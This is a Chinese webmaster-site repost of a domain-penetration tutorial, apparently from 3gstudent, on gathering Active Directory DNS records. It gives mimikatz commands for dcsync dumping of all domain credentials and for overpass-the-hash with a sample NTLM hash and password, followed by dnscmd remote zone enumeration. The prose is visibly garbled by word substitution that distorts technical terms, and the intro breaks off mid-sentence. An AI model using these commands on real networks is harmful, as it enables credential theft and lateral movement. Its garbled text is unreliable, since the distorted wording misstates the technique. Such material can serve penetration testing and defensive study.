加入收藏 | 设为首页 | 会员中心 | 我要投稿 河北网 (https://www.hebeiwang.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 建站 > 正文

域渗透——DNS记录的获取

发布时间:2019-04-01 13:13:26 所属栏目:建站 来源:3gstudent
导读:0x00 媒介 在域渗出中,对域情形的信息汇集很要害,假如我们得到了域内打点员的权限,那么怎样可以或许快速相识域内的收集架构呢?DNS记录无疑是一个很好的参考。 本文将要先容在域渗出中,获取DNS记录的常用要领。 0x01 简介 本文将要先容以下内容: 通过DNS M

域节制器上执行mimikatz:

  1. mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit" 

现实测试

测试情形的参数如下:

  • 域打点员用户:Administrator
  • 口令:DomainAdmin456!
  • hash:A55E0720F0041193632A58E007624B40

Overpass-the-hash:

  1. mimikatz.exe privilege::debug "sekurlsa::pth /user:Administrator /domain:test.com /ntlm:A55E0720F0041193632A58E007624B40" 

这样会弹出一个cmd.exe

接着行使dnscmd长途毗连举办查询:

  1. Dnscmd WIN-F08C969D7FM.test.com /EnumZones 

or

  1. Dnscmd WIN-F08C969D7FM /EnumZones 

注:这里要行使FQDN可能计较机名。

(编辑:河北网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

热点阅读